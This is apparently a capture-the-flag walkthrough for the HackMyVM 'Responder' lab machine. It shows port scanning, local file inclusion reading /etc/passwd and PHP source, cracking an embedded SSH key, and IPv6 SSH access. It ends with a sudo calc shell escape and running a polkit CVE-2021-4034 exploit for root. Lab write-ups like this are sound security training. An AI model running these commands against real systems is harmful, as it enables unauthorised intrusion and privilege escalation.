HackMyVm Responder Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Responder
Scan ports, notice the port 22 is filtered.
nmap -sV -sC -oN port.log 192.168.56.100
Nmap scan report for darkmatter.hmv (192.168.56.100)
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.38 (Debian)
Check port 80, only a simple page tells the current time.
~/D/responder $curl 192.168.56.100
your answer is in the answer.. it's
01:46
and your time is running out..
Scan port 80, found filemanager.php. Scan threads can not be too big, I set it to 20.
~/D/responder $gobuster dir -u 192.168.56.100/ -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log
/index.php (Status: 200) [Size: 73]
/filemanager.php (Status: 302) [Size: 0] [--> /]
Fuzz the param of filemanager.php, get random.
~/D/responder $wfuzz -u "192.168.56.100/filemanager.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/common.txt --hh 0
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000003395: 302 27 L 39 W 1430 Ch "random"
LFI worked, check passwd, get two user names.
~/D/responder $curl "192.168.56.100/filemanager.php?random=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
...
elliot:x:1001:1001::/home/elliot:/bin/bash
rohit:x:1002:1002::/home/rohit:/bin/bash
After enum some linux files, we can not get shell through log files. So check source code of filemanager.php, we get a ssh key.
~/D/responder $curl "192.168.56.100/filemanager.php?random=php://filter/convert.base64-en
code/resource=filemanager.php" |base64 -d
...
<?php
$filename = $_GET['random'];
include($filename);
header('Location:/');
/*
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,411124D3C302D4F4
XC2kbWNBYa20zDArT6BMeCgKa9oRs8T5sCVws1wGik8ZWChF4h6N9TzDnDGEMUPG
...
Decrypt the ssh key with john.
~/D/responder $/usr/share/john/ssh2john.py id_rsa > hash.txt
~/D/responder $john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
...
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx (id_rsa)
Now we have the user name, ssh key and password to connect port 22, but port 22 is filtered. Maybe it can be connected through ipv6.
Check ipv6 address of the machine.
~/D/responder $ping6 -c2 -n -I eth1 ff02::1
ping6: Warning: source address might be selected on device other than: eth1
PING ff02::1(ff02::1) from :: eth1: 56 data bytes
...
64 bytes from fe80::a00:27ff:fec2:1426%eth1: icmp_seq=1 ttl=64 time=4.76 ms
...
Check port 22 with ipv6, yes, it's open.
~/D/responder $nmap -6 -p22 fe80::a00:27ff:fec2:1426%eth1
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-05 08:59 CST
Nmap scan report for fe80::a00:27ff:fec2:1426
Host is up (0.0097s latency).
PORT STATE SERVICE
22/tcp open ssh
Log in ssh as user elliot.
~/D/responder $ssh elliot@fe80::a00:27ff:fec2:1426%eth1 -i id_rsa -6
Enter passphrase for key 'id_rsa':
Linux responder 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
elliot@responder:~$ id
uid=1001(elliot) gid=1001(elliot) groups=1001(elliot)
Check sudo -l.
elliot@responder:~$ sudo -l
sudo: unable to resolve host responder: Temporary failure in name resolution
Matching Defaults entries for elliot on responder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elliot may run the following commands on responder:
(rohit) NOPASSWD: /usr/bin/calc
Run calc, enter help page, input "!/bin/bash" after ":".
elliot@responder:~$ sudo -u rohit /usr/bin/calc
sudo: unable to resolve host responder: Temporary failure in name resolution
C-style arbitrary precision calculator (version 2.12.7.2)
Calc is open software. For license details type: help copyright
[Type "exit" to exit, or "help" for help.]
; help
...
For more information while running calc, type help followed by one of the
following topics:
topic description
----- -----------
intro introduction to calc
overview overview of calc
help this file
...
!/bin/bash
...
rohit@responder:/home/elliot$ id
uid=1002(rohit) gid=1002(rohit) groups=1002(rohit)
Check SUID files, notice polkit.
elliot@responder:~$ find / -perm -u=s 2>/dev/null
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/mount
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/umount
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
Use the lastest CVE of polkit to get root.
elliot@responder:/tmp$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
elliot@responder:/tmp$ ./cve-2021-4034-poc
# id
uid=0(root) gid=0(root) groups=0(root),1001(elliot)